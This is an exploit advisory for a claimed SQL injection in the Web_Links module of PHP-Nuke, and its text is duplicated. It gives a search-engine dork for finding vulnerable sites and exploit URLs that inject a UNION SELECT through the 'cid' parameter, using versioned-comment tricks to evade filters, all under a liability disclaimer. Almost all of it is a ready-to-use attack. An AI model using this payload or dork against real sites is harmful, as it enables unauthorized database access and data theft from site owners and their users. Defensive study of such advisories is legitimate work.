PHP-Nuke module(Web Links) - Sql Injection Vulnerabilty
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : https://www.phpnuke.org/
.:. Dork : inurl:"modules.php?op=" & "name=Web_Links"
####################################################################
#########
EXPLOIT
#########
Type: Mysql Injection
http://SITE/modules.php?op=modload&name=Web_Links&file=index&req=viewlink&cid=[SQLINJECTION]
http://SITE/modules.php?op=modload&name=Web_Links&file=index&req=viewlink&cid=-1+/*!50000UnIoN*/+/*!50000SeLeCt*/+1,2
####################################################################
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : https://www.phpnuke.org/
.:. Dork : inurl:"modules.php?op=" & "name=Web_Links"
####################################################################
#########
EXPLOIT
#########
Type: Mysql Injection
http://SITE/modules.php?op=modload&name=Web_Links&file=index&req=viewlink&cid=[SQLINJECTION]
http://SITE/modules.php?op=modload&name=Web_Links&file=index&req=viewlink&cid=-1+/*!50000UnIoN*/+/*!50000SeLeCt*/+1,2
####################################################################
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information